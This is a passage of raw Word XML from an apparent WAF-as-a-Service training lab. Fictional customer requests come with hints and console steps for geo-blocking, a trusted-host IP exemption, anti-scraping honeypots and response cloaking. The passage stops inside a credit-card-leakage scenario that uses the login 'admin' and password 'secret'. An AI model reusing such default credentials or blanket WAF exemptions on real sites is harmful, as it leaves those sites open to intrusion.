        <w:t>United States and United Kingdom to the Blocked side.</w:t>
      </w:r>
      <w:r w:rsidR="4266A2AE">
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="4F6FC872" w14:textId="1D77613D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Turn on blocking for TOR Nodes and Anonymous Proxies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="007D01EA" w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="07DA250D" w14:textId="26751F35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>Click Save.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0CFF0B51" w:rsidRDefault="0CFF0B51" w14:paraId="2AD24BCC" w14:textId="7CFBF1B9">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="220C8D24" w14:textId="51BF0223">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>Request #</w:t>
      </w:r>
      <w:r w:rsidR="190CFA40">
        <w:rPr/>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="3F2D05B2" w14:textId="165C804B">
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve">I have an anti-defacement service that accesses the store and I want it to be exempt from all </w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>WAF</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve"> checks</w:t>
      </w:r>
      <w:r w:rsidR="1B722F6C">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>and be able to do anything unconditionally</w:t>
      </w:r>
      <w:r w:rsidR="264EE83A">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>The service always sends requests from the IP 38.227.79.50</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>.”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="610B3734" w14:textId="390970F6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidR="4CE0FD67">
        <w:rPr/>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="32965056" w:rsidRDefault="007D01EA" w14:paraId="619A5F6E" w14:textId="3228C540">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="40" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="32965056" w:rsidR="771C133F">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Look </w:t>
      </w:r>
      <w:r w:rsidRPr="32965056" w:rsidR="4CE0FD67">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">at the available components in WAFaaS to see what would </w:t>
      </w:r>
      <w:r w:rsidRPr="32965056" w:rsidR="394A2234">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>allow requests from a specific IP to be always “trusted”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="32965056" w:rsidRDefault="007D01EA" w14:paraId="549B99D4" w14:textId="1F48B705">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="674D2E56" w14:textId="23324122">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="15DE336D" w14:textId="486930E7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve">Add the </w:t>
      </w:r>
      <w:r w:rsidRPr="32965056" w:rsidR="007D01EA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Trusted Hosts</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve"> component.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3A943E86" w:rsidP="21B1CB40" w:rsidRDefault="3A943E86" w14:paraId="266DA2F8" w14:textId="351E17CA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidR="3A943E86">
        <w:drawing>
          <wp:inline wp14:editId="17E1D2E7" wp14:anchorId="1C6F963A">
            <wp:extent cx="5715000" cy="1352550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1680396535" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R3385b30cd63742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1352550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="5699A015" w14:textId="6F0A25BE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enable Trusted Hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="07D0A2DB" w14:textId="20C25557">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>Click Add Host. Enter the IP 38.227.79.50 and mask 255.255.255.255.  Enter “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t>Anti_Defacement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve">” for the </w:t>
      </w:r>
      <w:r w:rsidR="39837D8E">
        <w:rPr/>
        <w:t>name and</w:t>
      </w:r>
      <w:r w:rsidR="007D01EA">
        <w:rPr/>
        <w:t xml:space="preserve"> click Add.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D01EA" w:rsidP="007D01EA" w:rsidRDefault="007D01EA" w14:paraId="529D3A5A" w14:textId="277F5DEB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Click Save.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="699639B3" w:rsidRDefault="699639B3" w14:paraId="424F7AE2" w14:textId="2BB6700B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="1FC964CF" w14:textId="5D17F447">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="00DE1F9B" w:rsidRDefault="00DE1F9B" w14:paraId="334AA67C" w14:textId="724AD83B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t>Request #</w:t>
      </w:r>
      <w:r w:rsidR="1C3928E5">
        <w:rPr/>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="04673A86" w14:textId="6B9EA77D"/>
    <w:p w:rsidR="00DE1F9B" w:rsidP="00DE1F9B" w:rsidRDefault="00DE1F9B" w14:paraId="5B98B6A0" w14:textId="25CC2361">
      <w:r>
        <w:t>“My competitor, TerribleStore, started selling the same things and whenever I change my prices, their prices are almost immediately 1 cent cheaper than mine!  How do they do that?  How do I stop them?”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="00DE1F9B" w:rsidRDefault="00DE1F9B" w14:paraId="77B58D62" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="00DE1F9B" w:rsidRDefault="00DE1F9B" w14:paraId="6F3F4996" w14:textId="655A468C">
      <w:r w:rsidR="01863C00">
        <w:rPr/>
        <w:t>Consider what</w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve"> type of software would t</w:t>
      </w:r>
      <w:r w:rsidR="302736D3">
        <w:rPr/>
        <w:t xml:space="preserve">hey </w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t>use to get a database of all our customer’s products and prices</w:t>
      </w:r>
      <w:r w:rsidR="7F1B87F9">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="00DE1F9B" w:rsidRDefault="00DE1F9B" w14:paraId="4914FE7A" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="00DE1F9B" w:rsidRDefault="00DE1F9B" w14:paraId="468D48AA" w14:textId="1045291C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t>The competitor is using a Web Scraper to scrape our customer’s price list</w:t>
      </w:r>
      <w:r w:rsidR="4B261D74">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="4B261D74">
        <w:rPr/>
        <w:t>Let us</w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve"> stop them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="00DE1F9B" w:rsidRDefault="00DE1F9B" w14:paraId="61D3D011" w14:textId="4C36C639">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Add the Distributed Denial-of-Service component.  Choose the Web Scraping sub-page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DE1F9B" w:rsidP="699639B3" w:rsidRDefault="00DE1F9B" w14:paraId="217BB649" w14:textId="26F9EA42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t>Hmm, it looks like we already have web scraping prevention turned on</w:t>
      </w:r>
      <w:r w:rsidR="2A78900D">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve">Try turning on </w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve">both of the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t>Honeypots</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve"> options</w:t>
      </w:r>
      <w:r w:rsidR="217BF616">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t>Maybe that</w:t>
      </w:r>
      <w:r w:rsidR="00DE1F9B">
        <w:rPr/>
        <w:t xml:space="preserve"> will confuse the scraper and get it to stop bothering us!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="03BBB4C7" w:rsidP="699639B3" w:rsidRDefault="5C64CE9E" w14:paraId="25576E7D" w14:textId="656C9846">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidR="5C64CE9E">
        <w:drawing>
          <wp:inline wp14:editId="6FBD621D" wp14:anchorId="7567AA57">
            <wp:extent cx="3028950" cy="1474089"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="138511127" name="Picture 138511127" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 138511127"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R3ebf62b5c6804b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8950" cy="1474089"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00DE1F9B" w:rsidR="00DE1F9B" w:rsidP="699639B3" w:rsidRDefault="00DE1F9B" w14:paraId="2BB2DF12" w14:textId="5286423A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Choose the Client Evaluation sub</w:t>
      </w:r>
      <w:r w:rsidR="0058093A">
        <w:t xml:space="preserve">-page.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00DE1F9B" w:rsidR="00DE1F9B" w:rsidP="699639B3" w:rsidRDefault="0F97E62A" w14:paraId="7A6411B8" w14:textId="65EDA782">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="0F97E62A">
        <w:rPr/>
        <w:t xml:space="preserve">Client Evaluation might stop the Web Scraper as it stops all bots. </w:t>
      </w:r>
      <w:r w:rsidR="207E34A3">
        <w:drawing>
          <wp:inline wp14:editId="3FF70A26" wp14:anchorId="3CEDA2A1">
            <wp:extent cx="2847976" cy="736955"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1024916528" name="Picture 1024916528" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1024916528"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R133e532f0a1c46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47976" cy="736955"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0F97E62A">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="00DE1F9B" w:rsidR="00DE1F9B" w:rsidP="699639B3" w:rsidRDefault="0058093A" w14:paraId="52A917BD" w14:textId="063711C3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Turn on Client Evaluation and click Save.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidRDefault="699639B3" w14:paraId="3124FAB4" w14:textId="752188D1">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E0B96" w:rsidP="008E0B96" w:rsidRDefault="00307BB7" w14:paraId="655BA995" w14:textId="37D64CBC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Security Concern: Server </w:t>
      </w:r>
      <w:r w:rsidR="002939CF">
        <w:t>Info Disclosure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002939CF" w:rsidP="002939CF" w:rsidRDefault="002939CF" w14:paraId="396AC941" w14:textId="01C348A7">
      <w:r>
        <w:t>The customer reports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002939CF" w:rsidP="32F6121D" w:rsidRDefault="002939CF" w14:paraId="32DFB3D1" w14:textId="59F815AF">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidR="002939CF">
        <w:rPr/>
        <w:t>One day I accidentally mistyped a URL and went to /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002939CF">
        <w:rPr/>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002939CF">
        <w:rPr/>
        <w:t>-bon instead of /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002939CF">
        <w:rPr/>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002939CF">
        <w:rPr/>
        <w:t>-bin</w:t>
      </w:r>
      <w:r w:rsidR="002939CF">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="002939CF">
        <w:rPr/>
        <w:t xml:space="preserve">I got this error message that also shows the exact version of Apache </w:t>
      </w:r>
      <w:r w:rsidR="63FED70D">
        <w:rPr/>
        <w:t>I am</w:t>
      </w:r>
      <w:r w:rsidR="002939CF">
        <w:rPr/>
        <w:t xml:space="preserve"> running. I want to make sure we block that so clients </w:t>
      </w:r>
      <w:r w:rsidR="4812AEE0">
        <w:rPr/>
        <w:t>cannot</w:t>
      </w:r>
      <w:r w:rsidR="002939CF">
        <w:rPr/>
        <w:t xml:space="preserve"> tell what an old, unpatched version of Apache </w:t>
      </w:r>
      <w:r w:rsidR="09CB02A6">
        <w:rPr/>
        <w:t>I am</w:t>
      </w:r>
      <w:r w:rsidR="002939CF">
        <w:rPr/>
        <w:t xml:space="preserve"> running!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002939CF" w:rsidP="002939CF" w:rsidRDefault="002939CF" w14:paraId="533E4825" w14:textId="69E01F04">
      <w:r>
        <w:t>How can you fix this?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002939CF" w:rsidP="002939CF" w:rsidRDefault="002939CF" w14:paraId="5612BF95" w14:textId="4E1034E9">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Hint</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidRPr="002939CF" w:rsidR="002939CF" w:rsidP="002939CF" w:rsidRDefault="002939CF" w14:paraId="5ECAB897" w14:textId="7364E8D1">
      <w:r>
        <w:t xml:space="preserve">The Response Cloaking component </w:t>
      </w:r>
      <w:r w:rsidRPr="002939CF">
        <w:t>prevents leakage of information about an application that is vulnerable to attacks</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002939CF" w:rsidP="002939CF" w:rsidRDefault="002939CF" w14:paraId="24F3F257" w14:textId="77777777">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002939CF" w:rsidP="002939CF" w:rsidRDefault="002939CF" w14:paraId="2F9F5F2F" w14:textId="55CCE0F6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add the </w:t>
      </w:r>
      <w:r w:rsidRPr="699639B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response Cloaking</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> component.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002939CF" w:rsidP="699639B3" w:rsidRDefault="0315DFD0" w14:paraId="3BC6E73D" w14:textId="7DE66CE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="0315DFD0">
        <w:rPr/>
        <w:t>On the Status Codes to Pass Through card, remove 404</w:t>
      </w:r>
      <w:r w:rsidR="5C7D09E1">
        <w:drawing>
          <wp:inline wp14:editId="51D275C1" wp14:anchorId="2AE3E5EE">
            <wp:extent cx="5715000" cy="742950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="247427004" name="Picture 247427004" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 247427004"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rb8209f084fd841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5000" cy="742950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="699639B3" w:rsidP="32965056" w:rsidRDefault="699639B3" w14:paraId="07A245A4" w14:textId="76317268">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="002939CF">
        <w:rPr/>
        <w:t>Click Save.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="32965056" w:rsidRDefault="32965056" w14:paraId="28DDD2C6" w14:textId="7814D860">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009307BA" w:rsidP="699639B3" w:rsidRDefault="009307BA" w14:paraId="229E2784" w14:textId="4308DBC4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Security Concern: Credit Card Leakage</w:t>
      </w:r>
      <w:r w:rsidR="5009B39E">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="02201430" w:rsidP="21B1CB40" w:rsidRDefault="35E38E72" w14:paraId="1AB9327B" w14:textId="03D76A42">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidR="35E38E72">
        <w:drawing>
          <wp:inline wp14:editId="38484138" wp14:anchorId="6A593ECA">
            <wp:extent cx="1600200" cy="1236133"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1864284847" name="Picture 1864284847" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 1864284847"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Racc5d68acf6c48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00200" cy="1236133"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009307BA" w:rsidP="009307BA" w:rsidRDefault="009307BA" w14:paraId="32B0D6B1" w14:textId="274AE9DE">
      <w:r>
        <w:t>The customer reports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009307BA" w:rsidP="32F6121D" w:rsidRDefault="009307BA" w14:paraId="7FFABB8B" w14:textId="4293293B">
      <w:pPr>
        <w:pStyle w:val="Quote"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>was showing off my reporting system to our auditor last week</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">I </w:t>
      </w:r>
      <w:r w:rsidR="009307BA">
        <w:rPr/>
        <w:t>logged into the site’s admin interface by going to the “Login/Register” page, entering “admin” in the username box and “secret” in the password</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve"> box</w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t xml:space="preserve">Then I went to the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
        <w:t>Super Secret</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D140A2">
        <w:rPr/>
